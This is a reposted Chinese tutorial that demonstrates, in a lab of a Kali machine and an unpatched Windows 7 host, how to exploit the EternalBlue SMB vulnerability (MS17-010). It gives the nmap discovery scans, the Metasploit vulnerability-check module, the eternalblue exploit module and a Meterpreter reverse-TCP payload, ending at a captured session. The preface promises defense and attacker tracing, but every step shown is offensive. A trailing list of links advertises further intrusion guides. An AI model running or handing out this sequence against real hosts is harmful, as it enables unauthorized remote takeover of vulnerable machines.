前言:

本文的目的并不是教会学者入侵win7主机,

而是被入侵之后怎么反制并且做好下一步的防范

以及查到攻击者的蛛丝马迹

攻击原理:

利用未修复永恒之蓝的445端口漏洞入侵目标主机

演示设备:

主机 IP
kali Linux 10.11.4.3
Windows7 10.11.4.152

(win7条件为无防火墙,无杀软)

攻击前准备:

  1. 扫描目标网段
  2. 扫描目标IP
  3. 使用msf工具的aux模块来测试目标是否能被正常攻击

1.1)--->扫描目标网段

开启kali终端输入

nmap -sP 10.11.4.0/24

nmap的参数-sP较为快速,意为进行ping扫描,打印出对扫描做出响应的主机,但不做进一步测试(如端口扫描或者操作系统探测)。

得到结果为

得到两个IP地址,一个为本机kali的IP地址10.11.4.3,另一个则为win7的IP地址10.11.4.152

1.2)--->扫描目标IP

在kali终端输入nmap -O 10.11.4.152

nmap的参数-O为系统类型扫描,同样会列出端口详细信息。

得到结果为:

可以看到要利用的445端口为open,即打开状态

1.3)--->使用msf工具的aux模块来测试目标是否能被正常攻击

输入msfconsole进入到msf工具

每次打开msf工具的图案都不相同,无须担心

搜寻相关的攻击辅助模块以及攻击模块

输入:

search ms17

得到:

第1个为扫描检测漏洞辅助模块(下标为1),第2个为要使用的攻击模块(eternalblue永恒之蓝)

加载扫描检测漏洞辅助模块

输入:

use auxiliary/scanner/smb/smb_ms17_010

得到:

进入到加载扫描检测漏洞辅助模块

检测需要传入什么参数

只需传入rhost

在这需要传入的参数比较简单,传入要被检测的目标IP即可

输入:

set rhost 10.11.4.152

得到:

传入rhost

接着执行这个已经设置好参数的探测模块

输入:

run

得到:

翻译为: 主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)

Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)

至此已成功一大半,下面让我们进行对目标主机的攻击

  1. 进入攻击模
  2. 查看参数并传入参数
  3. 执行攻击

2.1)--->进入攻击模块

输入:

use exploit/windows/smb/ms17_010_eternalblue

得到:

2.2)--->查看参数并传入参数

输入:

show options

得到:

需要设置的参数为payload(攻击载荷),rhost(目标IP)

输入:

set payload windows/x64/meterpreter/reverse_tcp

得到:

payload只需要配置监听返回会话的IP

输入:

set rhosts 10.11.4.152

得到:

设置目标IP

2.3)--->执行攻击

输入:

exploit

得到:

如果网络不好的话会在这里卡一会,或者目标系统有杀软的话,就会卡在这里

出现最下面的=-=-=-WIN=-=-=-就代表已成功拿到权限

kali入侵win7(转载)相关推荐

  1. 渗透测试-Kali入侵Win7主机

    前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而 ...

  2. Metasploit入侵win7系统

    Metasploit入侵win7系统 一:实验环境 二:获得信息 a.获得网络拓扑图 b.获得主机ip和目标ip 三:实施入侵 a.打开控制终端 b.查找漏洞 c.进行配置 四:对主机进行操作 五:做 ...

  3. kali利用MSF对ms17_010漏洞入侵win7

    步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...

  4. 记一次MSF永恒之蓝入侵win7系统实验

    目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目 ...

  5. kali入侵windows

    因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门. ####实验环境 ![实验环境.jpg](h ...

  6. kali入侵内网电脑和入侵外网电脑

    生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵) 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下: -p:使用反向远程控制程序"windows/ ...

  7. ms17_010 入侵Win7

    一.win7镜像的下载 二.进入msfconsole ┌──(root㉿kali-2002)-[~] └─# msfconsole 等待一会儿,出现  msf6>  即为进入成功 三.查找漏洞 ...

  8. Kali入侵Windows主机

    一.测试环境 Kali Linux 172.16.11.222 Windows主机 172.16.11.230 二.木马生成 在 Kali 终端输入以下命令生成木马文件QQ.exe msfvenom ...

  9. 网站服务器取证案例,教你如何通过服务器日志进行入侵取证(转载)

    转载自:网卫大学堂 http://www.wwdxt.com/ 日志文件默认位置: 应用程序日志.安全日志.系统日志.DNS日志默认位置:%systemroot%/system32/config, 默 ...

最新文章

  1. Apache常见功能实战详解
  2. Objective-C:MRC(引用计数器)在OC内部的可变对象是适用的,不可变对象是不适用的(例如 NSString、NSArray等)...
  3. [LeetCode] 102. Binary Tree Level Order Traversal_Medium tag: BFS
  4. P2 Matlab计算基础-《Matlab/Simulink与控制系统仿真》程序指令总结
  5. docker学习系列14 使用haproxy实现mysql集群的负载均衡...
  6. mysql数据库设计规范_MYSQL数据库设计规范与原则
  7. c语言怎么让图形界面单独显示,「分享」C语言如何编写图形界面
  8. Ubuntu16.04 SSH 免密登录
  9. Undefined control sequence. \makecover
  10. Python hashlib模块中的sha加密
  11. java8中字符串常量以及GC相应处理机制
  12. python自定义安装哪些不需要_python setup.py配置,用于在自定义目录中安装文件
  13. Elasticsearch集群配置以及REST API使用
  14. vs code安装使用ESLint,typescript
  15. 4.linux基础1
  16. JQuery提交表单form
  17. 超薄内置DSP数字功放芯片
  18. 新浪微博开放平台使用
  19. java源文件只能有一import_Java源文件的声明规则
  20. Win Server 2008 R2

热门文章

  1. 如何防止黑客入侵:保护计算机安全的 7 种方法
  2. 2021/06/29计算机视觉期末复习笔记整理
  3. JAVA开发学习——欢迎来到JAVA开发世界!
  4. Android小应用:余额宝万份收益查询小工具
  5. 用matlab代码实现QDA,matlab数据库
  6. 典型的Top K算法_找出一个数组里面前K个最大数
  7. sql server 64位导入数据源中没有excel_【超级软件】PDFXEdit7Portable x32/64位
  8. excel中批量删除公式,保留数值
  9. PB修改源码时报错:C0176: Badly ordered TYPE and VARIABLE declarations. Is this modified exported source?
  10. 工业互联的未来发展趋势